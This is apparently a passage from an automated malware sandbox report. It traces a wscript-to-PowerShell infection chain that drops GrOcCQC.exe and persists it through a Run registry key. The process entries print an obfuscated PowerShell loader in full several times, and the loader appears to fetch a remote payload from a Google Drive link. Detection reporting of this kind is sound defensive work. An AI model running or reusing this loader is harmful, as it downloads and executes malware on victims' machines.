drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,	Jump to behavior

Binary contains a suspicious time stamp

Source: GrOcCQC.exe.15.dr

Static PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]

PE file contains sections with non-standard names

Source: GrOcCQC.exe.15.dr

Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFE57817E38 push eax; retf	9_2_00007FFE57817E41
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFE578100BD pushad ; iretd	9_2_00007FFE578100C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFE578E2E8D push eax; retf	9_2_00007FFE578E2E8E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_046B93A5 push eax; retf	13_2_046B93A9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07591FC8 push eax; mov dword ptr [esp], ecx	13_2_075921B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08B044E9 push 8BD38B50h; iretd	13_2_08B044EF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08B0427E push 8BD68B50h; iretd	13_2_08B04291
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08B01B3B push FFFFFFE8h; iretd	13_2_08B01B3D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08B04748 push 8BD38B50h; iretd	13_2_08B0474E
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Code function: 16_2_007E13F8 pushfd ; retf	16_2_007E13F9
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Code function: 16_2_007E376D push ecx; ret	16_2_007E3780

Drops PE files

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File created: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe

Jump to dropped file

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GrOcCQC			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GrOcCQC			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File opened: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe:Zone.Identifier read attributes | delete

Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
